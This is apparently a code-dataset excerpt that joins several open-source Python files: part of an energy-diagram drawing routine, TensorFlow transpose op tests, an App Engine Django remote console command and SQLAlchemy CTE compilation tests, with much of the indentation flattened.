Emult = {'J/mol': 1.0, 'kJ/mol': 0.001, 'cal/mol': 1.0/4.184, 'kcal/mol': 1.0/4184., 'cm^-1': 1.0/11.962}[Eunits]
except KeyError:
raise Exception('Invalid value "{0}" for Eunits parameter.'.format(Eunits))
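        # Worked example of the unit handling (illustrative numbers): energies
        # are kept in kJ/mol internally, so a 50 kJ/mol barrier is printed as
        # 50 * 1000 * Emult, i.e. roughly 12.0 when Eunits is 'kcal/mol'.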
# Determine height required for drawing
Eheight = self.__getTextSize('0.0', format=format)[3] + 6
y_E0 = (E0max - 0.0) * Eslope + padding + Eheight
height = (E0max - E0min) * Eslope + 2 * padding + Eheight + 6
for i in range(len(wells)):
if 0.001 * wells[i].E0 == E0min:
height += labelRects[i][3]
break
# Determine naive position of each well (one per column)
coordinates = numpy.zeros((len(wells), 2), numpy.float64)
x = padding
for i in range(len(wells)):
well = wells[i]
rect = labelRects[i]
thisWellWidth = max(wellWidth, rect[2])
E0 = 0.001 * well.E0
y = y_E0 - E0 * Eslope
coordinates[i] = [x + 0.5 * thisWellWidth, y]
x += thisWellWidth + wellSpacing
width = x + padding - wellSpacing
# Determine the rectangles taken up by each well
# We'll use this to merge columns safely so that wells don't overlap
wellRects = []
for i in range(len(wells)):
l, t, w, h = labelRects[i]
x, y = coordinates[i,:]
if w < wellWidth: w = wellWidth
t -= 6 + Eheight
h += 6 + Eheight
wellRects.append([l + x - 0.5 * w, t + y + 6, w, h])
# Squish columns together from the left where possible until an isomer is encountered
oldLeft = numpy.min(coordinates[:,0])
Nleft = wells.index(network.isomers[0])-1
columns = []
for i in range(Nleft, -1, -1):
top = wellRects[i][1]
bottom = top + wellRects[i][3]
for j in range(len(columns)):
for c in columns[j]:
top0 = wellRects[c][1]
                    bottom0 = top0 + wellRects[c][3]
if (top >= top0 and top <= bottom0) or (top <= top0 and top0 <= bottom):
# Can't put it in this column
break
else:
# Can put it in this column
columns[j].append(i)
break
else:
# Needs a new column
columns.append([i])
for column in columns:
columnWidth = max([wellRects[c][2] for c in column])
x = coordinates[column[0]+1,0] - 0.5 * wellRects[column[0]+1][2] - wellSpacing - 0.5 * columnWidth
for c in column:
delta = x - coordinates[c,0]
wellRects[c][0] += delta
coordinates[c,0] += delta
newLeft = numpy.min(coordinates[:,0])
coordinates[:,0] -= newLeft - oldLeft
# Squish columns together from the right where possible until an isomer is encountered
Nright = wells.index(network.isomers[-1])+1
columns = []
for i in range(Nright, len(wells)):
top = wellRects[i][1]
bottom = top + wellRects[i][3]
for j in range(len(columns)):
for c in columns[j]:
top0 = wellRects[c][1]
bottom0 = top0 + wellRects[c][3]
if (top >= top0 and top <= bottom0) or (top <= top0 and top0 <= bottom):
# Can't put it in this column
break
else:
# Can put it in this column
columns[j].append(i)
break
else:
# Needs a new column
columns.append([i])
for column in columns:
columnWidth = max([wellRects[c][2] for c in column])
x = coordinates[column[0]-1,0] + 0.5 * wellRects[column[0]-1][2] + wellSpacing + 0.5 * columnWidth
for c in column:
delta = x - coordinates[c,0]
wellRects[c][0] += delta
coordinates[c,0] += delta
width = max([rect[2]+rect[0] for rect in wellRects]) - min([rect[0] for rect in wellRects]) + 2 * padding
# Draw to the final surface
surface = createNewSurface(format=format, target=path, width=width, height=height)
cr = cairo.Context(surface)
# Some global settings
cr.select_font_face("sans")
cr.set_font_size(self.options['fontSizeNormal'])
# Fill the background with white
cr.set_source_rgba(1.0, 1.0, 1.0, 1.0)
cr.paint()
# # DEBUG: Draw well bounding rectangles
# cr.save()
# cr.set_line_width(1.0)
# for rect in wellRects:
# cr.rectangle(*rect)
# cr.set_source_rgba(0.0, 0.0, 1.0, 0.5)
# cr.stroke()
# cr.restore()
# Draw path reactions
for rxn in network.pathReactions:
for reac in range(len(wells)):
if wells[reac].species == rxn.reactants:
break
else:
raise Exception
for prod in range(len(wells)):
if wells[prod].species == rxn.products:
break
else:
raise Exception
E0_reac = wells[reac].E0 * 0.001 - E0_offset
E0_prod = wells[prod].E0 * 0.001 - E0_offset
E0_TS = rxn.transitionState.conformer.E0.value_si * 0.001 - E0_offset
if reac < prod:
x1, y1 = coordinates[reac,:]
x2, y2 = coordinates[prod,:]
else:
x1, y1 = coordinates[prod,:]
x2, y2 = coordinates[reac,:]
x1 += wellSpacing / 2.0; x2 -= wellSpacing / 2.0
if abs(E0_TS - E0_reac) > 0.1 and abs(E0_TS - E0_prod) > 0.1:
if len(rxn.reactants) == 2:
if reac < prod: x0 = x1 + wellSpacing * 0.5
else: x0 = x2 - wellSpacing * 0.5
elif len(rxn.products) == 2:
if reac < prod: x0 = x2 - wellSpacing * 0.5
else: x0 = x1 + wellSpacing * 0.5
else:
x0 = 0.5 * (x1 + x2)
y0 = y_E0 - (E0_TS + E0_offset) * Eslope
width1 = (x0 - x1)
width2 = (x2 - x0)
# Draw horizontal line for TS
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.set_line_width(2.0)
cr.move_to(x0 - TSwidth/2.0, y0)
cr.line_to(x0+TSwidth/2.0, y0)
cr.stroke()
# Add background and text for energy
E0 = "{0:.1f}".format(E0_TS * 1000. * Emult)
extents = cr.text_extents(E0)
x = x0 - extents[2] / 2.0; y = y0 - 6.0
cr.rectangle(x + extents[0] - 2.0, y + extents[1] - 2.0, extents[2] + 4.0, extents[3] + 4.0)
cr.set_source_rgba(1.0, 1.0, 1.0, 0.75)
cr.fill()
cr.move_to(x, y)
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.show_text(E0)
# Draw Bezier curve connecting reactants and products through TS
cr.set_source_rgba(0.0, 0.0, 0.0, 0.5)
cr.set_line_width(1.0)
cr.move_to(x1, y1)
cr.curve_to(x1 + width1/8.0, y1, x0 - width1/8.0 - TSwidth/2.0, y0, x0 - TSwidth/2.0, y0)
cr.move_to(x0 + TSwidth/2.0, y0)
cr.curve_to(x0 + width2/8.0 + TSwidth/2.0, y0, x2 - width2/8.0, y2, x2, y2)
cr.stroke()
else:
width = (x2 - x1)
# Draw Bezier curve connecting reactants and products through TS
cr.set_source_rgba(0.0, 0.0, 0.0, 0.5)
cr.set_line_width(1.0)
cr.move_to(x1, y1)
cr.curve_to(x1 + width/4.0, y1, x2 - width/4.0, y2, x2, y2)
cr.stroke()
# Draw wells (after path reactions so that they are on top)
for i, well in enumerate(wells):
x0, y0 = coordinates[i,:]
# Draw horizontal line for well
cr.set_line_width(4.0)
cr.move_to(x0 - wellWidth/2.0, y0)
cr.line_to(x0 + wellWidth/2.0, y0)
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.stroke()
# Add background and text for energy
E0 = well.E0 * 0.001 - E0_offset
E0 = "{0:.1f}".format(E0 * 1000. * Emult)
extents = cr.text_extents(E0)
x = x0 - extents[2] / 2.0; y = y0 - 6.0
cr.rectangle(x + extents[0] - 2.0, y + extents[1] - 2.0, extents[2] + 4.0, extents[3] + 4.0)
cr.set_source_rgba(1.0, 1.0, 1.0, 0.75)
cr.fill()
cr.move_to(x, y)
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.show_text(E0)
# Draw background and text for label
x = x0 - 0.5 * labelRects[i][2]
y = y0 + 6
cr.rectangle(x, y, labelRects[i][2], labelRects[i][3])
cr.set_source_rgba(1.0, 1.0, 1.0, 0.75)
cr.fill()
self.__drawLabel(well, cr, x, y, format=format)
# Finish Cairo drawing
if format == 'png':
surface.write_to_png(path)
else:
surface.finish()
| mit | 6,278,887,971,954,168,000 | 38.367769 | 125 | 0.514223 | false |
theflofly/tensorflow | tensorflow/python/kernel_tests/transpose_op_test.py | 11 | 19816 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for Transpose op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.platform import test
class TransposeTest(test.TestCase):
def _np_transpose(self, x, perm):
ret = np.copy(x)
ret = ret.transpose(perm)
return ret
def _compareCpu(self, x, p, conjugate=False):
if p is None:
rank = x.ndim
perm = (rank - 1) - np.arange(rank)
else:
perm = p
np_ans = self._np_transpose(x, perm)
if conjugate:
np_ans = np.conj(np_ans)
with self.cached_session(use_gpu=False):
inx = ops.convert_to_tensor(x)
y = array_ops.transpose(inx, p, conjugate=conjugate)
tf_ans = self.evaluate(y)
self.assertShapeEqual(np_ans, y)
self.assertAllEqual(np_ans, tf_ans)
jacob_t = None
# Gradient check on CPU.
xs = list(np.shape(x))
ys = list(np.shape(tf_ans))
if x.dtype in [np.float32, np.complex64]:
jacob_t, jacob_n = gradient_checker.compute_gradient(inx, xs, y, ys, x,
1e-2)
self.assertAllClose(jacob_t, jacob_n, 1e-3, 1e-3)
elif x.dtype in [np.float64, np.complex128]:
jacob_t, jacob_n = gradient_checker.compute_gradient(inx, xs, y, ys, x,
1e-2)
self.assertAllClose(jacob_t, jacob_n, 1e-6, 1e-6)
return tf_ans, jacob_t
def _compareGpu(self, x, p, conjugate=False):
if p is None:
rank = x.ndim
perm = (rank - 1) - np.arange(rank)
else:
perm = p
np_ans = self._np_transpose(x, perm)
if conjugate:
np_ans = np.conj(np_ans)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
y = array_ops.transpose(inx, p, conjugate=conjugate)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
jacob_t = None
# Gradient check on GPU.
xs = list(np.shape(x))
ys = list(np.shape(tf_ans))
if x.dtype == np.float32:
jacob_t, jacob_n = gradient_checker.compute_gradient(inx, xs, y, ys, x,
1e-2)
self.assertAllClose(jacob_t, jacob_n, 1e-3, 1e-3)
elif x.dtype == np.float64:
jacob_t, jacob_n = gradient_checker.compute_gradient(inx, xs, y, ys, x,
1e-2)
self.assertAllClose(jacob_t, jacob_n, 1e-6, 1e-6)
return tf_ans, jacob_t
def _compare(self, x, use_gpu=False):
n = np.ndim(x)
# generate all permutations of [0, 1, ... n-1] in random order.
all_perm = np.random.permutation(
[p for p in itertools.permutations(range(n))]).astype(np.int32)
cs = [False, True] if x.dtype in [np.complex64, np.complex128] else [False]
for c in cs:
for p in all_perm[:2]:
self._compareCpu(x, p, conjugate=c)
if use_gpu:
self._compareGpu(x, p, conjugate=c)
# Test with an empty permutation
for c in cs:
self._compareCpu(x, None, conjugate=c)
if use_gpu:
self._compareGpu(x, None, conjugate=c)
def _compare_cpu_gpu(self, x):
n = np.ndim(x)
# generate all permutation of [0, 1, ... n-1] in random order,
# choose the first two.
perms = itertools.permutations(range(n))
for _ in range(2):
p = np.random.permutation(next(perms)).astype(np.int32)
tf_a_cpu, tf_g_cpu = self._compareCpu(x, p)
tf_a_gpu, tf_g_gpu = self._compareGpu(x, p)
assert tf_g_cpu is not None
assert tf_g_gpu is not None
if x.dtype == np.float32:
self.assertAllClose(tf_a_cpu, tf_a_gpu, 1e-3, 1e-3)
self.assertAllClose(tf_g_cpu, tf_g_gpu, 1e-3, 1e-3)
elif x.dtype == np.float64:
self.assertAllClose(tf_a_cpu, tf_a_gpu, 1e-6, 1e-6)
self.assertAllClose(tf_g_cpu, tf_g_gpu, 1e-6, 1e-6)
def _testBoth(self, x):
self._compare(x, use_gpu=False)
self._compare(x, use_gpu=True)
def testRank1(self):
self._compareCpu(np.arange(0., 2), [0])
def test1D(self):
vector = np.arange(0, 2).reshape((1, 1, 1, 2, 1))
self._compare(vector, use_gpu=False)
self._compare(vector, use_gpu=True)
def test5DGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
large_shapes = [[4, 10, 10, 10, 3], [4, 10, 10, 10, 8], [4, 10, 10, 10, 13],
[4, 3, 10, 10, 10], [4, 8, 10, 10, 10], [4, 13, 10, 10,
10]] * 3
perms = [[0, 4, 1, 2, 3]] * 3 + [[0, 2, 3, 4, 1]] * 3 + [[
4, 1, 2, 3, 0
]] * 6 + [[1, 2, 3, 4, 0]] * 6
datatypes = [np.int8, np.float16, np.float32, np.float64, np.complex128]
for datatype in datatypes:
for input_shape, perm in zip(large_shapes, perms):
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=datatype).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
def test4DGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
large_shapes = [[4, 10, 10, 3], [4, 10, 10, 8], [4, 10, 10, 13],
[4, 3, 10, 10], [4, 8, 10, 10], [4, 13, 10, 10]] * 3
perms = [[0, 3, 1, 2]] * 3 + [[0, 2, 3, 1]] * 3 + [[3, 1, 2, 0]] * 6 + [[
1, 2, 3, 0
]] * 3 + [[2, 3, 0, 1]] * 3
for input_shape, perm in zip(large_shapes, perms):
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=np.float32).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
# shapes related to Inception (taken from conv_ops_test.py)
inception_shapes = [[4, 5, 5, 124], [4, 8, 8, 38], [4, 8, 8, 38], [
4, 8, 8, 204
], [4, 8, 8, 44], [4, 8, 8, 204], [4, 8, 8, 204], [4, 8, 8, 204], [
4, 8, 8, 176
], [4, 8, 8, 176], [4, 8, 8, 176], [4, 8, 8, 176], [4, 17, 17, 19], [
4, 17, 17, 19
], [4, 17, 17, 124], [4, 17, 17, 12], [4, 17, 17, 124], [4, 17, 17, 22], [
4, 17, 17, 19
], [4, 17, 17, 19], [4, 17, 17, 121], [4, 17, 17, 121], [4, 17, 17, 22], [
4, 17, 17, 19
], [4, 17, 17, 19], [4, 17, 17, 115], [4, 17, 17, 115], [4, 17, 17, 19], [
4, 17, 17, 16
], [4, 17, 17, 115], [4, 17, 17, 102], [4, 17, 17, 12], [4, 17, 17, 102], [
4, 17, 17, 12
], [4, 17, 17, 102], [4, 17, 17, 12], [4, 17, 17, 76], [4, 17, 17, 12], [
4, 17, 17, 12
], [4, 17, 17, 76], [4, 17, 17, 76], [4, 35, 35, 9], [4, 35, 35, 28], [
4, 35, 35, 6
], [4, 35, 35, 28], [4, 35, 35, 25], [4, 35, 35, 4], [4, 35, 35, 25],
[4, 35, 35, 9], [4, 35, 35, 19], [4, 35, 35, 19],
[4, 35, 35, 19], [4, 73, 73, 6], [4, 73, 73,
6], [4, 147, 147, 2]]
for input_shape in inception_shapes:
perm = [0, 3, 1, 2]
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=np.float32).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
def test3DGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
datatypes = [np.int8, np.float16, np.float32, np.float64, np.complex128]
large_shapes = [[4, 1000, 3], [4, 1000, 8], [4, 1000, 13], [4, 3, 1000],
[4, 8, 1000], [4, 13, 1000]] * 3
perms = [[0, 2, 1]] * 6 + [[2, 1, 0]] * 6 + [[1, 2, 0]] * 3 + [[2, 0, 1]
] * 3
for datatype in datatypes:
for input_shape, perm in zip(large_shapes, perms):
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=datatype).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
def testLargeSizeGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
large_shapes = [[1000000, 31, 3], [3, 1000000, 31], [3, 31, 1000000],
[10000, 310, 3], [3, 10000, 310], [3, 310, 10000],
[2, 1000, 1000], [1000, 2, 1000], [1000, 1000, 2]]
perms = [[0, 2, 1]] * 9
for input_shape, perm in zip(large_shapes, perms):
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=np.float32).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
def testRandomizedSmallDimLargeSizeGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
# Draw 10 random shapes with large dimension sizes.
# 40% prob to generate dim[0] size within [1, 2047]
# 40% prob to generate dim[0] size within [2048, 4095]
# 20% prob to generate dim[0] size within [4096, 100000]
# 50% prob to use dim[1] as the small dim (<16)
num_samples = 10
total_size = 500000
small_size_limit = 2048
large_size_limit = 95905
small_size_percentage = 0.4
medium_size_percentage = 0.4
large_size_percentage = 0.2
perms = [[0, 2, 1]] * num_samples
dim_zero_sizes = []
dim_zero_sizes += list(
np.random.randint(
small_size_limit, size=int(small_size_percentage * num_samples)) +
1)
dim_zero_sizes += list(
np.random.randint(
small_size_limit, size=int(medium_size_percentage * num_samples)) +
small_size_limit)
dim_zero_sizes += list(
np.random.randint(
large_size_limit, size=int(large_size_percentage * num_samples)) +
small_size_limit * 2)
input_shapes = []
small_dim_limit = 16
for dim_zero_size in dim_zero_sizes:
small_dim_size = np.random.randint(small_dim_limit - 1) + 1
large_dim_size = int(
total_size / dim_zero_size / small_dim_size) + small_dim_limit
input_shapes += ([[dim_zero_size, small_dim_size, large_dim_size]]
if np.random.randint(2) else
[[dim_zero_size, large_dim_size, small_dim_size]])
for input_shape, perm in zip(input_shapes, perms):
# generate input data with random ints from 0 to 9.
inp = np.random.randint(10, size=input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
self._ClearCachedSession()
def testNop(self):
self._compareCpu(np.arange(0, 6).reshape([3, 2]).astype(np.float32), [0, 1])
def testSimple(self):
self._compareCpu(
np.arange(0, 8).reshape([2, 4]).astype(np.float32),
np.array([1, 0]).astype(np.int32))
def testPermType(self):
for perm_dtype in [np.int64, np.int32]:
x = np.arange(0, 8).reshape([2, 4]).astype(np.float32)
p = np.array([1, 0]).astype(perm_dtype)
np_ans = np.copy(x).transpose(p)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
inp = constant_op.constant(p)
y = array_ops.transpose(inx, inp)
tf_ans = self.evaluate(y)
self.assertShapeEqual(np_ans, y)
self.assertAllEqual(np_ans, tf_ans)
def testHalf(self):
self._compare(np.arange(0, 21).reshape([3, 7]).astype(np.float16))
self._compare(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.float16))
self._compare(
np.arange(0, 16).reshape([1, 2, 1, 2, 1, 2, 1, 2]).astype(np.float16))
def testFloat(self):
self._compare_cpu_gpu(np.arange(0, 21).reshape([3, 7]).astype(np.float32))
self._compare_cpu_gpu(
np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.float32))
self._compare_cpu_gpu(
np.arange(0, 16).reshape([1, 2, 1, 2, 1, 2, 1, 2]).astype(np.float32))
def testDouble(self):
self._compare_cpu_gpu(np.arange(0, 21).reshape([3, 7]).astype(np.float64))
self._compare_cpu_gpu(
np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.float64))
self._compare_cpu_gpu(
np.arange(0, 16).reshape([1, 2, 1, 2, 1, 2, 1, 2]).astype(np.float64))
def testComplex64(self):
self._testBoth(
np.complex(1, 2) *
np.arange(0, 21).reshape([3, 7]).astype(np.complex64))
self._testBoth(
np.complex(1, 2) *
np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.complex64))
self._testBoth(
np.complex(1, 2) *
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.complex64))
def testComplex128(self):
self._testBoth(
np.complex(1, 2) *
np.arange(0, 21).reshape([3, 7]).astype(np.complex128))
self._testBoth(
np.complex(1, 2) *
np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.complex128))
self._testBoth(
np.complex(1, 2) *
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.complex128))
def testInt8(self):
self._testBoth(np.arange(0, 21).reshape([3, 7]).astype(np.int8))
self._testBoth(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.int8))
self._testBoth(
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.int8))
def testInt16(self):
self._testBoth(np.arange(0, 21).reshape([3, 7]).astype(np.int16))
self._testBoth(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.int16))
self._testBoth(
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.int16))
def testInt32(self):
self._testBoth(np.arange(0, 21).reshape([3, 7]).astype(np.int32))
self._testBoth(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.int32))
self._testBoth(
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.int32))
def testInt64(self):
self._testBoth(np.arange(0, 21).reshape([3, 7]).astype(np.int64))
self._testBoth(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.int64))
self._testBoth(
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.int64))
def testTranspose2DAuto(self):
x_np = [[1, 2, 3], [4, 5, 6]]
for use_gpu in [False, True]:
with self.cached_session(use_gpu=use_gpu):
x_tf = array_ops.transpose(x_np).eval()
self.assertAllEqual(x_tf, [[1, 4], [2, 5], [3, 6]])
def testSingletonDims(self):
# A singleton dimension is a dimension i with shape[i] == 1. Such dimensions
# can be collapsed and expanded using reshape without changing the
# underlying data storage. If all non-singleton dimensions remain in
# ascending order, the shuffled singletons will be transposed by a reshape,
# saving a memory allocation & copy. Since this gets a special code-path in
# transpose_op.cc, we test that the codepath is exercised and the results
# are as expected; we do not test that we save the memory allocation and
# copy here.
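    # Illustrative case (not exercised as a separate assertion): shape
    # [2, 1, 2] with perm (1, 0, 2) only moves the singleton axis, so the
    # result is the same buffer viewed as shape [1, 2, 2], i.e. a reshape.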
for shape in [[2, 1, 2], [2, 1, 2, 1, 1, 2], [1, 2, 2, 1, 1, 1],
[1, 1, 1, 2, 2, 2], [2, 2, 1, 1, 1]]:
self._compare_cpu_gpu(
np.arange(np.prod(shape)).reshape(shape).astype(np.float32))
def testTransposeShapes(self):
self.assertEqual(
[],
array_ops.transpose(array_ops.placeholder(
dtypes.int32, shape=[])).get_shape().dims)
self.assertEqual(
[100],
array_ops.transpose(array_ops.placeholder(
dtypes.int32, shape=[100])).get_shape().dims)
self.assertEqual(
[37, 100],
array_ops.transpose(
array_ops.placeholder(
dtypes.int32, shape=[100, 37])).get_shape().dims)
self.assertEqual(
[100, 37],
array_ops.transpose(
array_ops.placeholder(
dtypes.int32, shape=[100, 37]), [0, 1]).get_shape().dims)
self.assertEqual(
[15, 37, 100],
array_ops.transpose(
array_ops.placeholder(
dtypes.int32, shape=[100, 37, 15])).get_shape().dims)
self.assertEqual(
[15, 100, 37],
array_ops.transpose(
array_ops.placeholder(
dtypes.int32, shape=[100, 37, 15]), [2, 0, 1]).get_shape().dims)
self.assertEqual(
tensor_shape.TensorShape(None),
array_ops.transpose(array_ops.placeholder(dtypes.int32)).get_shape())
self.assertEqual(
tensor_shape.TensorShape(None),
array_ops.transpose(array_ops.placeholder(dtypes.int32),
[0]).get_shape())
def testNullTensor(self):
with self.cached_session():
x = constant_op.constant([], dtype=dtypes.float32, shape=[1, 4, 0])
xt = array_ops.transpose(x, [0, 2, 1]).eval()
self.assertAllEqual(xt.shape, (1, 0, 4))
def testScalar(self):
with self.cached_session():
x = constant_op.constant(42, dtype=dtypes.float32, shape=[])
xt = array_ops.transpose(x).eval()
self.assertAllEqual(xt, x)
def _testError(self, x, p, err):
with self.cached_session():
with self.assertRaisesOpError(err):
array_ops.transpose(x, p).eval()
def testError(self):
with self.assertRaises(ValueError):
array_ops.transpose(
np.arange(0., 30).reshape([2, 3, 5]), [[0, 1], [2, 3]])
with self.assertRaises(ValueError):
array_ops.transpose(np.arange(0., 30).reshape([2, 3, 5]), [0, 1, 3])
self._testError(
np.arange(0., 30).reshape([2, 3, 5]), [0, 1, 1], "2 is missing")
if __name__ == "__main__":
test.main()
| apache-2.0 | 5,516,664,797,517,688,000 | 38.632 | 80 | 0.571457 | false |
jackxiang/google-app-engine-django | appengine_django/management/commands/console.py | 49 | 1564 | #!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import code
import getpass
import os
import sys
from django.conf import settings
from django.core.management.base import BaseCommand
from google.appengine.ext.remote_api import remote_api_stub
def auth_func():
return raw_input('Username:'), getpass.getpass('Password:')
class Command(BaseCommand):
""" Start up an interactive console backed by your app using remote_api """
help = 'Start up an interactive console backed by your app using remote_api.'
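  # Invocation sketch (argument layout inferred from run_from_argv below):
  #   ./manage.py console <app_id> [host]
  # where host defaults to <app_id>.appspot.com when omitted.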
def run_from_argv(self, argv):
app_id = argv[2]
if len(argv) > 3:
host = argv[3]
else:
host = '%s.appspot.com' % app_id
remote_api_stub.ConfigureRemoteDatastore(app_id,
'/remote_api',
auth_func,
host)
code.interact('App Engine interactive console for %s' % (app_id,),
None,
locals())
| apache-2.0 | 7,015,716,380,063,928,000 | 30.918367 | 79 | 0.642583 | false |
davidjb/sqlalchemy | test/sql/test_cte.py | 23 | 18962 | from sqlalchemy.testing import fixtures
from sqlalchemy.testing import AssertsCompiledSQL, assert_raises_message
from sqlalchemy.sql import table, column, select, func, literal
from sqlalchemy.dialects import mssql
from sqlalchemy.engine import default
from sqlalchemy.exc import CompileError
class CTETest(fixtures.TestBase, AssertsCompiledSQL):
__dialect__ = 'default'
def test_nonrecursive(self):
orders = table('orders',
column('region'),
column('amount'),
column('product'),
column('quantity')
)
regional_sales = select([
orders.c.region,
func.sum(orders.c.amount).label('total_sales')
]).group_by(orders.c.region).cte("regional_sales")
top_regions = select([regional_sales.c.region]).\
where(
regional_sales.c.total_sales > select([
func.sum(regional_sales.c.total_sales) / 10
])
).cte("top_regions")
s = select([
orders.c.region,
orders.c.product,
func.sum(orders.c.quantity).label("product_units"),
func.sum(orders.c.amount).label("product_sales")
]).where(orders.c.region.in_(
select([top_regions.c.region])
)).group_by(orders.c.region, orders.c.product)
# needs to render regional_sales first as top_regions
# refers to it
self.assert_compile(
s,
"WITH regional_sales AS (SELECT orders.region AS region, "
"sum(orders.amount) AS total_sales FROM orders "
"GROUP BY orders.region), "
"top_regions AS (SELECT "
"regional_sales.region AS region FROM regional_sales "
"WHERE regional_sales.total_sales > "
"(SELECT sum(regional_sales.total_sales) / :sum_1 AS "
"anon_1 FROM regional_sales)) "
"SELECT orders.region, orders.product, "
"sum(orders.quantity) AS product_units, "
"sum(orders.amount) AS product_sales "
"FROM orders WHERE orders.region "
"IN (SELECT top_regions.region FROM top_regions) "
"GROUP BY orders.region, orders.product"
)
def test_recursive(self):
parts = table('parts',
column('part'),
column('sub_part'),
column('quantity'),
)
included_parts = select([
parts.c.sub_part,
parts.c.part,
parts.c.quantity]).\
where(parts.c.part == 'our part').\
cte(recursive=True)
incl_alias = included_parts.alias()
parts_alias = parts.alias()
included_parts = included_parts.union(
select([
parts_alias.c.sub_part,
parts_alias.c.part,
parts_alias.c.quantity]).
where(parts_alias.c.part == incl_alias.c.sub_part)
)
s = select([
included_parts.c.sub_part,
func.sum(included_parts.c.quantity).label('total_quantity')]).\
select_from(included_parts.join(
parts, included_parts.c.part == parts.c.part)).\
group_by(included_parts.c.sub_part)
self.assert_compile(
s, "WITH RECURSIVE anon_1(sub_part, part, quantity) "
"AS (SELECT parts.sub_part AS sub_part, parts.part "
"AS part, parts.quantity AS quantity FROM parts "
"WHERE parts.part = :part_1 UNION "
"SELECT parts_1.sub_part AS sub_part, "
"parts_1.part AS part, parts_1.quantity "
"AS quantity FROM parts AS parts_1, anon_1 AS anon_2 "
"WHERE parts_1.part = anon_2.sub_part) "
"SELECT anon_1.sub_part, "
"sum(anon_1.quantity) AS total_quantity FROM anon_1 "
"JOIN parts ON anon_1.part = parts.part "
"GROUP BY anon_1.sub_part")
# quick check that the "WITH RECURSIVE" varies per
# dialect
self.assert_compile(
s, "WITH anon_1(sub_part, part, quantity) "
